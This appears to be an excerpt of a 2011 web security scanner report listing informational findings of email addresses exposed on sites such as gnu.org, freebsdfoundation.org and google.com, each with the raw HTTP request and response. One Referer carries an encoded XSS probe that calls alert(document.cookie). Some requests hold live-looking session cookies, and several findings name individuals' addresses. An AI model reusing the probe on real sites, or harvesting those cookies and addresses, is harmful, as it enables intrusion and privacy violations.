...[SNIP]...
<a
href="mailto:contacto@bsd-peru.org">contacto@bsd-peru.org</a>
...[SNIP]...
<a name="oceania-buga" href="mailto:majordomo@lemis.com" id="oceania-buga">
...[SNIP]...
<a
href="mailto:majordomo@lemis.com">majordomo@lemis.com</a>
...[SNIP]...

24.325. http://www.freebsdfoundation.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsdfoundation.org
Path:	/

Issue detail

The following email address was disclosed in the response:

webmaster@freebsdfoundation.org

Request

GET / HTTP/1.1
Host: www.freebsdfoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:39 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 12801

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<meta name="email" content="webmaster@freebsdfoundation.org" />
...[SNIP]...

24.326. http://www.freebsdfoundation.org/donate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsdfoundation.org
Path:	/donate/

Issue detail

The following email addresses were disclosed in the response:

donations@freebsdfoundation.org
webmaster@freebsdfoundation.org

Request

GET /donate/ HTTP/1.1
Host: www.freebsdfoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:40 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 10624

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<meta name="email" content="webmaster@freebsdfoundation.org" />
...[SNIP]...
<input type="hidden" name="business" value="donations@freebsdfoundation.org">
...[SNIP]...

24.327. http://www.gnu.org/copyleft/gpl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnu.org
Path:	/copyleft/gpl.html

Issue detail

The following email addresses were disclosed in the response:

gnu@gnu.org
web-translators@gnu.org
webmasters@gnu.org
you@example.com

Request

GET /copyleft/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:42 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Mon, 24 Jan 2011 16:39:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...

...[SNIP]...

24.328. http://www.gnu.org/licenses/gpl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnu.org
Path:	/licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:

gnu@gnu.org
web-translators@gnu.org
webmasters@gnu.org
you@example.com

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:02:45 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 25 Jan 2011 00:02:45 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...

...[SNIP]...

24.329. http://www.gnu.org/licenses/licenses.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnu.org
Path:	/licenses/licenses.html

Issue detail

The following email addresses were disclosed in the response:

gnu@gnu.org
licensing@fsf.org
licensing@gnu.org
web-translators@gnu.org
webmasters@gnu.org
you@example.com

Request

GET /licenses/licenses.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:41 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Mon, 24 Jan 2011 16:39:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 28853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a
href="/licenses/license-list.html#LicensingMailingList"><licensing@fsf.org>
mailing list</a>
...[SNIP]...
<a href="mailto:licensing@gnu.org">
...[SNIP]...
<a
href="mailto:licensing@fsf.org"><licensing@fsf.org></a>
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...

...[SNIP]...

24.330. http://www.gnu.org/licenses/old-licenses/gpl-2.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnu.org
Path:	/licenses/old-licenses/gpl-2.0.html

Issue detail

The following email addresses were disclosed in the response:

gnu@gnu.org
web-translators@gnu.org
webmasters@gnu.org
you@example.com

Request

GET /licenses/old-licenses/gpl-2.0.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:41 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Mon, 24 Jan 2011 16:39:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...

...[SNIP]...

24.331. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

obrien@FreeBSD.org

Request

GET /search?q=aub+assemble+usenet+binary&hl=en&tbo=1&output=search&source=lnt&tbs=qdr:m&sa=X&ei=o5I9Tfm_A4SKlweG35CjBw&ved=0CAcQpwUoBA&fp=9809f9a75fc5a4aa&tch=1&ech=1&psi=hJI9Td-zDaCeevCInIsK12958808728107 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: GeNLY2f-
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:29 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: application/json; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 51131

MsNN-Rbk....S....Y....|.........#..]{e:"pZI9TfOKFcH_lgf0opSUBw",c:1,u:"http://www.google.com/search?q\x3daub+assemble+usenet+binary\x26hl\x3den\x26tbo\x3d1\x26output\x3dsearch\x26source\x3dlnt\x26tbs\
...[SNIP]...
\\x3d\\x22f std\\x22 \\x3eJan 17, 2011\\x3c/span\\x3e - \\x3cem\\x3eaub\\x3c/em\\x3e-2.2_1: \\x3cem\\x3eAssemble usenet binaries\\x3c/em\\x3e. Long description | Sources | Main Web Site Maintained by: obrien@FreeBSD.org \\x26middot; bgrab-1.3.6: \\x3cem\\x3eBinary\\x3c/em\\x3e Grabber - downloads \\x3cb\\x3e...\\x3c/b\\x3e\\x3cbr\\x3e\\x3cspan class\\x3df\\x3e\\x3ccite\\x3ewww.freebsd.org/ports/news.html\\x3c/cite\\
...[SNIP]...

24.332. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

eapeters@chr.ucla.edu

Request

Response

24.333. https://www.google.com/accounts/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/Login

Issue detail

The following email address was disclosed in the response:

pat@example.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=adTYhQttweA;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 24 Jan 2011 16:44:39 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

24.334. https://www.google.com/accounts/ServiceLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:

pat@example.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=UyGwfUaxON0;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 24 Jan 2011 16:45:03 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10829
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

24.335. http://www.goozernation.com/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.goozernation.com
Path:	/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq

Issue detail

The following email address was disclosed in the response:

mike@goozernation.com

Request

Response

24.336. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guardian.co.uk
Path:	/media/2011/jan/24/amazon-lovefilm-deal-films/x22

Issue detail

The following email address was disclosed in the response:

userhelp@guardian.co.uk

Request

Response

24.337. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guardian.co.uk
Path:	/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Issue detail

The following email address was disclosed in the response:

userhelp@guardian.co.uk

Request

Response

24.338. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guardian.co.uk
Path:	/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

Issue detail

The following email address was disclosed in the response:

userhelp@guardian.co.uk

Request

Response

24.339. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The following email address was disclosed in the response:

lokesh.dhakar@gmail.com

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:07 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 20:38:11 GMT
ETag: "a0be022-3006-4817846d0f2c0"
Accept-Ranges: bytes
Content-Length: 12294
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

<title>Lightbox 2<
...[SNIP]...
<input type="hidden" name="business" value="lokesh.dhakar@gmail.com" />
...[SNIP]...

24.340. https://www.isc.org/software/inn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.isc.org
Path:	/software/inn

Issue detail

The following email address was disclosed in the response:

inn-workers@lists.isc.org

Request

GET /software/inn HTTP/1.1
Host: www.isc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.341. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlacommunity.eu
Path:	/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The following email address was disclosed in the response:

donatie@joomlacommunity.eu

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://www.jo
...[SNIP]...
<input type="hidden" name="business" value="donatie@joomlacommunity.eu"/>
...[SNIP]...

24.342. http://www.kbsp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kbsp.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

cclarke@kbsp.com
dzdobinski@kbsp.com
jobs@kbsp.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:04:54 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7l DAV/2 mod_jk/1.2.23 mod_fastcgi/2.4.2 mod_scgi_pubsub/1.11-pubsub mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 02 Dec 2010 20:39:41 GMT
ETag: "97908-80e8-496736bcf5d40"
Accept-Ranges: bytes
Content-Length: 33000
Cache-Control: max-age=60
Expires: Mon, 24 Jan 2011 22:05:54 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<a class="contactLinks" href="mailto: cclarke@kbsp.com">cclarke@kbsp.com <img src='x/images/orangeArrow.png' width='3' height='5' alt='' />
...[SNIP]...
<a class="contactLinks" href="mailto: dzdobinski@kbsp.com">dzdobinski@kbsp.com <img src='x/images/orangeArrow.png' width='3' height='5' alt='' />
...[SNIP]...
<a class="contactLinks" href="mailto: jobs@kbsp.com">jobs@kbsp.com <img src='x/images/orangeArrow.png' width='3' height='5' alt='' />
...[SNIP]...

24.343. http://www.kelvinluck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kelvinluck.com
Path:	/

Issue detail

The following email address was disclosed in the response:

emansouri@ucompass.com

Request

GET / HTTP/1.1
Host: www.kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.344. http://www.lau.edu.lb/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lau.edu.lb
Path:	/x22

Issue detail

The following email addresses were disclosed in the response:

krodriguez@lau.edu.lb
lrachidi@lau.edu.lb
rewa.borjas@lau.edu.lb

Request

GET /x22 HTTP/1.1
Host: www.lau.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:26 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 2977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<t
...[SNIP]...
e this file is updated, kindly check if the **
** footer_alumni.php file needs to be updted as well **
**********************************************************

- Updated By Louaye Rachidi (lrachidi@lau.edu.lb) on 2008/09/05.
- Updated by Rewa Borjas (rewa.borjas@lau.edu.lb) c. 2008/12/20.
- Updated by Karina Rodriguez (krodriguez@lau.edu.lb) on 2008/12/30.
-->
...[SNIP]...

24.345. http://www.leafnode.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.leafnode.org
Path:	/

Issue detail

The following email address was disclosed in the response:

m-a@users.sourceforge.net

Request

GET / HTTP/1.1
Host: www.leafnode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:01:28 GMT
Content-Type: text/html
Connection: close
Accept-Ranges: bytes
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 16:01:28 GMT
Content-Length: 6073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<HTML lang="en">
<HEAD>
<link rel="stylesheet" title="Leafnode style" href="ln.css">
<link
...[SNIP]...
<a href="mailto:m-a@users.sourceforge.net">
...[SNIP]...

24.346. http://www.lithuanianjoomla.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/index.php

Issue detail

The following email address was disclosed in the response:

info@lithuanianjoomla.com

Request

GET /index.php?format=feed&type=rss HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 11621

<?xml version="1.0" encoding="utf-8"?>

<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Lithuanianjoom
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Antanas Vipartas)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Antanas Vipartas )</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Rimas Armaitis, koregavo Antanas Vipartas)</author>
...[SNIP]...

24.347. http://www.lithuanianjoomla.com/media/system/js/mootools-more.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/media/system/js/mootools-more.js

Issue detail

The following email addresses were disclosed in the response:

erik@domain.com
espen@domene.no
fred@domain.com
fred@domain.hu
fred@domaine.com
fred@domein.nl
fred@dominio.com
jan@domena.pl
maria@bernasconi.ch
matti@meikalainen.com
max@mustermann.de
name@domain.com
nome@dominio.com

Request

GET /media/system/js/mootools-more.js HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:00 GMT
Server: Apache
Last-Modified: Mon, 10 Jan 2011 15:32:50 GMT
ETag: "31195df-5244c-4d2b26a2"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 336972

// MooTools: the javascript framework.
// Load this file's selection again by visiting: http://mootools.net/more/f04c978bcdfd762ce3cc0d21a61c819d
// Or build this file again with packager using: pack
...[SNIP]...
   dateSuchAs: 'Please enter a valid date such as {date}',
   dateInFormatMDY: 'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',
   email: 'Please enter a valid email address. For example "fred@domain.com".',
   url: 'Please enter a valid URL such as http://www.google.com.',
   currencyDollar: 'Please enter a valid $ amount. For example $100.00 .',
   oneRequired: 'Please enter something for at least one of
...[SNIP]...
a valida com {date}',
   dateInFormatMDY: 'Per favor introdueix una data valida com DD/MM/YYYY (p.e. "31/12/1999")',
   email: 'Per favor, introdueix una adre..a de correu electronic valida. Per exemple, "fred@domain.com".',
   url: 'Per favor introdueix una URL valida com http://www.google.com.',
   currencyDollar: 'Per favor introdueix una quantitat valida de .... Per exemple ...100,00 .',
   oneRequired: 'Per favor intro
...[SNIP]...
'Zadejte pros..m platn.. datum jako {date}',
   dateInFormatMDY: 'Zadejte pros..m platn.. datum jako MM / DD / RRRR (tj. "12/31/1999")',
   email: 'Zadejte pros..m platnou e-mailovou adresu. Nap....klad "fred@domain.com".',
   url: 'Zadejte pros..m platnou URL adresu jako http://www.google.com.',
   currencyDollar: 'Zadejte pros..m platnou ....stku. Nap....klad $100.00.',
   oneRequired: 'Zadejte pros..m alespo.. jednu hod
...[SNIP]...
ndre tegn er ikke tilladt.',
   dateSuchAs: 'Skriv en gyldig dato som {date}',
   dateInFormatMDY: 'Skriv dato i formatet DD-MM-YYYY (f.eks. "31-12-1999")',
   email: 'Skriv en gyldig e-mail adresse. F.eks "fred@domain.com".',
   url: 'Skriv en gyldig URL adresse. F.eks "http://www.google.com".',
   currencyDollar: 'Skriv et gldigt bel..b. F.eks Kr.100.00 .',
   oneRequired: 'Et eller flere af felterne i denne formular skal u
...[SNIP]...
rmatMDY: 'Geben Sie bitte ein gültiges Datum ein. Wie zum Beispiel TT.MM.JJJJ (z.B. "31.12.1999")',
   email: 'Geben Sie bitte eine gültige E-Mail Adresse ein. Wie zum Beispiel "maria@bernasconi.ch".',
   url: 'Geben Sie bitte eine gültige URL ein. Wie zum Beispiel http://www.google.ch.',
   currencyDollar: 'Geben Sie bitte einen gültigen Betrag in Schweizer Franken ein. Wie zum Beisp
...[SNIP]...
quot;).',
   dateInFormatMDY: 'Geben Sie bitte ein gültiges Datum im Format TT.MM.JJJJ ein (z.B. "31.12.1999").',
   email: 'Geben Sie bitte eine gültige E-Mail-Adresse ein (z.B. "max@mustermann.de").',
   url: 'Geben Sie bitte eine gültige URL ein (z.B. "http://www.google.de").',
   currencyDollar: 'Geben Sie bitte einen gültigen Betrag in EURO ein (z.B. 100.00€).',

...[SNIP]...
como {date}',
   dateInFormatMDY: 'Por favor ingrese una fecha v..lida, utulizando el formato DD/MM/YYYY (p.e. "31/12/1999")',
   email: 'Por favor, ingrese una direcci..n de e-mail v..lida. Por ejemplo, "fred@dominio.com".',
   url: 'Por favor ingrese una URL v..lida como http://www.google.com.',
   currencyDollar: 'Por favor ingrese una cantidad v..lida de pesos. Por ejemplo $100,00 .',
   oneRequired: 'Por favor ingrese a
...[SNIP]...
o {date}',
   dateInFormatMDY: 'Por favor introduce una fecha válida como DD/MM/YYYY (p.e. "31/12/1999")',
   email: 'Por favor, introduce una dirección de email válida. Por ejemplo, "fred@domain.com".',
   url: 'Por favor introduce una URL válida como http://www.google.com.',
   currencyDollar: 'Por favor introduce una cantidad válida de .... Por ejemplo ...100,00 .',
   oneRequired: 'Por
...[SNIP]...
lun sisestage kehtiv kuup..ev kujul {date}',
   dateInFormatMDY: 'Palun sisestage kehtiv kuup..ev kujul MM.DD.YYYY (n..iteks: "12.31.1999").',
   email: 'Palun sisestage kehtiv e-maili aadress (n..iteks: "fred@domain.com").',
   url: 'Palun sisestage kehtiv URL (n..iteks: http://www.google.com).',
   currencyDollar: 'Palun sisestage kehtiv $ summa (n..iteks: $100.00).',
   oneRequired: 'Palun sisestage midagi v..hemalt ..he
...[SNIP]...
: '........ .... .......... .......... .... ...... MM/DD/YYYY ........ ........ (.......... "12/31/1999").',
   email: '........ .... ........ .......... .......... ........ ......... ........ ........ "fred@domain.com".',
   url: '........ .... URL .......... .......... http://www.google.com ........ .........',
   currencyDollar: '........ .... ............ .......... ........ ...... ...... ........ ........ .........
...[SNIP]...
kiksi {date}',
   dateInFormatMDY: 'Ole hyv.. ja anna kelvollinen p..iv..m....r.. muodossa pp/kk/vvvv (kuten "12/31/1999")',
   email: 'Ole hyv.. ja anna kelvollinen s..hk..postiosoite (kuten esimerkiksi "matti@meikalainen.com").',
